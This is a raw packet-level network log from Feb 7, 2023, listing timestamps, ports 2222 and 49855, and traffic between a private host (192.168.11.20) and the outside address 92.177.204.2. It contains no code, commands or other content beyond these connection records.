Feb 7, 2023 18:30:30.954605103 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.954916954 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.954957962 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.954966068 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.955087900 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.955305099 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.955475092 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.955521107 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.955530882 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.955538988 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.955545902 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.955816984 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.955986977 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.956154108 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.956162930 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.956533909 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.956542969 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.956567049 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.956654072 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.956732035 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.956948042 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.957099915 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.957643032 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.957752943 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.957761049 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.957818031 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.957865953 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.957917929 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.958086014 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.958098888 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.958257914 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.997204065 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.997258902 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.997299910 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.997415066 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.997504950 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.997613907 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.997873068 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.998039007 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.998168945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.998213053 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.998398066 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.998543978 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.998605013 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.998876095 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.998939037 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.999054909 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.999104977 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.999145985 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.999212027 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.999377966 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.999557972 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.999591112 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.999631882 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.999737024 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.999741077 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.999778032 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.999897003 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.000066996 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.000066996 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.000243902 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.000571012 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.000910044 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.001076937 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.001089096 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.001117945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.001157045 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.001601934 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.001601934 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.001653910 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.001709938 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.001888037 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.002055883 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.002100945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.002141953 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.002142906 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.002252102 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.002589941 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.003091097 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.003130913 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.003139973 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.003237009 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.003277063 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.003319025 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.003402948 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.003552914 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.003592968 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.003698111 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.003757000 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.003835917 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.003933907 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.004044056 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.004090071 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.004131079 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.004201889 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.004436970 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.004616022 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.004638910 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.004657984 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.004697084 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.004771948 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.004925966 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.005002022 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.005084991 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.005104065 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005143881 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005249977 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005290031 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005327940 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005366087 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005405903 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005562067 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.005570889 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005610943 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005650043 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.005747080 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.005909920 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.006077051 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.006141901 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.006154060 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.006194115 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.006232023 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.006241083 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.006270885 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.006309032 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.006347895 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.006412983 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.006567955 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.006571054 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.006608963 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.006766081 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.006939888 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.006997108 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.007117987 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.007122993 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.007164955 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.007327080 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.007328033 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.007529974 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.007611990 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.007652998 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.007690907 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.007713079 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.007898092 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.008047104 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.008142948 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.008183956 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.008208990 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.008394957 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.008485079 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.009099960 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.009157896 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.009197950 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.009274006 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.009380102 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.009525061 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.009700060 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.009910107 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.010020018 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.010166883 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.048592091 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.048804045 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.048964024 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.048974991 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.049060106 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.049257994 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.049365997 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.049365997 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.049474001 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.049607992 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.049618006 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.049719095 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.049851894 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.049876928 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.049973011 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.050015926 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.050354004 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.050498009 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.050508022 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.050515890 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.050961018 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.050971985 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.050982952 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.051081896 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.051091909 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.051100016 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.051132917 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.051346064 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.051508904 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.051517963 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.051520109 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.051609039 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.052006960 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.052028894 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.052195072 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.052521944 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.052802086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.052967072 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.052978039 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.052984953 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053052902 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.053121090 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053132057 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053138971 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053147078 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053170919 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.053170919 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.053220034 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.053596020 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053606987 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053615093 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053622961 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.053733110 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.053777933 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.053997993 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.054167032 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.054260969 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.054493904 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.054502964 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.054513931 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.054522038 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.054649115 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.054955959 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.055021048 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.055068016 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.055120945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.055130005 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.055238008 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.055411100 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.055578947 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.055627108 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.055954933 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.055963993 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.055974960 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.056073904 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.056339025 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.056680918 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.056849003 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.057018995 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.057257891 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.057265997 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.057274103 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.057413101 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.057468891 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.057523012 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.057701111 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.057744026 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.057773113 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.057781935 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.057917118 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.058002949 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.058015108 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.058090925 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.058356047 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.058515072 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.058516026 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.058526039 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.058845043 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.058942080 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.058964968 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.058974028 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.058990002 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.059331894 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.059500933 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.059557915 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.059570074 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.059577942 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.059586048 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.059607029 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.059916019 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.059993029 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.060066938 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.060081959 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.060091972 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.060235977 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.060458899 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.060520887 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.060532093 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.060617924 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.060905933 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.060983896 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.061381102 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.061391115 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.061398983 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.061528921 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.061539888 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.061649084 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.061728001 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.061728001 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.061743975 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.061934948 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.062082052 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.062088966 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.062098980 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.062108040 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.062462091 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.062622070 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.062712908 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.062722921 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.062792063 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.062947035 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.063083887 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.063091993 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.063131094 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.063277960 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.063446045 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.063621044 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.063894987 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.063903093 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.063910961 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.063983917 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.064006090 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.064052105 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.064153910 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.064225912 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.064414024 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.064436913 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.064738035 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.064779997 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.064790010 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.064798117 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.064934015 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.065036058 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.065046072 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.065115929 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.065188885 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.065273046 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.065340042 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.065510035 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.065968990 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.065979004 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.065987110 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.065994024 CET	2222	49855	92.177.204.2	192.168.11.20
